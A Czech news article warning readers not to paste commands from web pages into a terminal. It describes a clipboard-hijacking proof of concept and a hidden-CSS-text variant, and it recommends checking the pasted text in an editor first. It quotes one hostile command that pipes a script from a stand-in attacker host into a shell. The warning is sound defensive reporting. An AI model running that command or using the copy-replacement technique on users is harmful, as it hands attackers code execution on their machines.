Bezpečnost | Javascript | Kód

Už nikdy nekopírujte a nevkládejte příkazy z webových stránek – můžete tak ohrozit Windows i Linux

  • Kopírujete někdy příkazy z webových stránek?
  • Pak byste toho měli hodně rychle nechat!
  • Můžete totiž zkopírovat škodlivý kód
Už nikdy nekopírujte a nevkládejte příkazy z webových stránek – můžete tak ohrozit Windows i Linux

Pokud někdy kopírujete příkazy z webových stránek přímo do terminálu či příkazového řádku, měli byste s tím hodně rychle přestat, varuje web Bleeping Computer. Riskujete totiž vážné ohrožení operačního systému svého počítače. Je přitom jedno, zda používáte Windows nebo Linux.

Nevěříte? Tak se sami přesvědčte! Gabriel Friedlander, zakladatel platformy pro školení o bezpečnosti Wizer, předvedl zřejmý, ale překvapivý hack, který vás přiměje k opatrnosti při kopírování a vkládání příkazů z webových stránek.

Proč nekopírovat příkazy z webů?

Friedlander varuje, že webová stránka může skrytě nahrazovat obsah schránky. V praxi to znamená, že to, co se do schránky skutečně zkopíruje, se může značně lišit od toho, co jste zkopírovat chtěli. Bez patřičné pozornosti tak snadno vložíte do příkazového řádku či terminálu něco úplně jiného, než bylo záměrem.

V jednoduchém důkazu konceptu (proof of concept; PoC), který Friedlander zveřejnil na svém blogu, žádá čtenáře, aby zkopírovali jednoduchý příkaz sudo apt update. V operačním systému Linux tento příkaz slouží ke zcela nevinnému stažení informací o balíčcích ze všech nakonfigurovaných zdrojů.

Háček je v tom, že po označení příkazu myší a jeho zkopírování (ať už klávesovou zkratkou Ctrl+C, nebo přes kontextovou nabídku Kopírovat pod pravým tlačítkem myši) se do schránky vloží úplně jiný řetězec. Konkrétně curl http://attacker-domain:8000/shell.sh | sh. Najednou tu máme příkaz ke stažení souboru a jeho spuštění v shellu!

Nejenže se do schránky zkopíruje úplně jiný příkaz, ale aby toho nebylo málo, je na jeho konci znak nového řádku (tedy Enter). Pokud byste takový příkaz v dobré víře vložili do terminálu, došlo by k jeho okamžitému spuštění a provedení.

Pozadí záludné záměny

Kouzlo spočívá v kódu v JavaScriptu skrytém ve stránce. Jakmile zkopírujete text sudo apt update obsažený v prvku HTML, spustí se níže uvedený úryvek kódu. Následně dojde k zachycení události kopírování „naslouchačem událostí“ a nahrazení obsahu schránky škodlivým testovacím kódem.

Klepněte pro větší obrázek Kód pro vložení textu bez vědomí uživatele

Tyto příkazy mají v JavaScriptu celou řadu legitimních případů použití, ale toto je jeden z několika příkladů, jak je možné je relativně snadno zneužít. „Proto byste NIKDY neměli kopírovat příkazy přímo do terminálu,“ varuje Friedlander.

„Myslíte si, že kopírujete nějakou věc, ale ta je nahrazena něčím jiným – například škodlivým kódem. Stačí jediný řádek vložený do kódu, který jste zkopírovali, a vytvoříte zadní vrátka do své aplikace. Tento útok je velmi jednoduchý, ale také velice škodlivý,“ uvádí objevitel na svém blogu.

Jde to i jinak

Jiný uživatel diskuzního webu Reddit v komentáři představil alternativní verzi tohoto triku, která nevyžaduje žádný JavaScript. Jeho pointa spočívá v neviditelném textu vytvořeném pomocí HTML a kaskádových stylů (CSS), který se zkopíruje do schránky při kopírování viditelných částí textu.

Klepněte pro větší obrázek Kód pro vložení textu bez vědomí uživatele

„Problém není jen v tom, že webová stránka může pomocí JavaScriptu měnit obsah vaší schránky,“ vysvětluje uživatel SwallowYourDreams. „Může také v HTML skrývat příkazy, které jsou pro lidské oko neviditelné, ale počítač je zkopíruje.“

V tuto chvíli tak máte přinejmenším dva důvody, proč byste nikdy neměli slepě věřit tomu, co zkopírujete z webové stránky. Ochrana je v tomto případě jednoduchá: nejprve vložte obsah schránky z webu do jednoduchého textového editoru, zkontrolujte ho, a teprve poté ho vkládejte do terminálu.

Diskuze (40) Další článek: Na každý den jiný design auta. Nové BMW je polepené e-inkem a na povel mění vzhled

Témata článku: Windows, Prohlížeče, Linux, Bezpečnost, Javascript, Reddit, Kód, Windows i Linux, Text, HTML, CTRL + C, Škodlivý kód, Kopírování, Schránka, Enter, Terminál, Bleeping Computer, Příkaz, CSS, Webová stránka



Recenze Samsungu Galaxy S21 FE. Trumfy jsou jasně dané, cena ale není tak lákavá jako u předchůdce

Recenze Samsungu Galaxy S21 FE. Trumfy jsou jasně dané, cena ale není tak lákavá jako u předchůdce

** Řada Galaxy S21 od Samsungu téměř po roce hlásí comeback! ** Otestovali jsme nejnovější Galaxy S21 FE 5G ** Silné stránky jsou zřejmé, cena by však mohla (a měla) být nižší

Martin Chroust
Android 12Recenze
Pitva Samsungu Galaxy Z Fold2. Vnitřnosti ohebného telefonu, to je technologický koncert

Pitva Samsungu Galaxy Z Fold2. Vnitřnosti ohebného telefonu, to je technologický koncert

Skládací telefony jsou stále docela nové a drahé, takže se nepoštěstí narazit na kus k popravě každý den. Tento má zničený vnitřní displej, ale jinak je funkční. Tak se pojďme podívat, jak to Samsung uvnitř vyřešil.

Jakub Michlovský
Ohebný displejSamsungPitva
Izrael díky speciální kamufláži zařídil pro své vojáky „neviditelnost“

Izrael díky speciální kamufláži zařídil pro své vojáky „neviditelnost“

** Materiál „Kit 300“ představuje vizuální i termální kamufláž ** Dokáže zablokovat tepelné vyzařování maskovaného vojáka či třeba stroje ** Velký kus materiálu Kit 300 může ukrýt vozidlo až do velikosti Hummeru

Stanislav Mihulka
IzraelMateriálArmáda
Dead Drops: Nejpomalejší internet na světě je připravený pro planetu po apokalypse

Dead Drops: Nejpomalejší internet na světě je připravený pro planetu po apokalypse

** V roce 2010 se začala rodit síť mrtvých schránek Dead Drops ** Byly jich tisíce, časem se na ně ale zapomnělo ** Vypravili jsme se ke schránce č. 595, která funguje dodnes

Jakub Čížek
ZajímavostiÚložiště
Už nikdy nekopírujte a nevkládejte příkazy z webových stránek – můžete tak ohrozit Windows i Linux

Už nikdy nekopírujte a nevkládejte příkazy z webových stránek – můžete tak ohrozit Windows i Linux

** Kopírujete někdy příkazy z webových stránek? ** Pak byste toho měli hodně rychle nechat! ** Můžete totiž zkopírovat škodlivý kód

Karel Kilián
KódJavascriptBezpečnost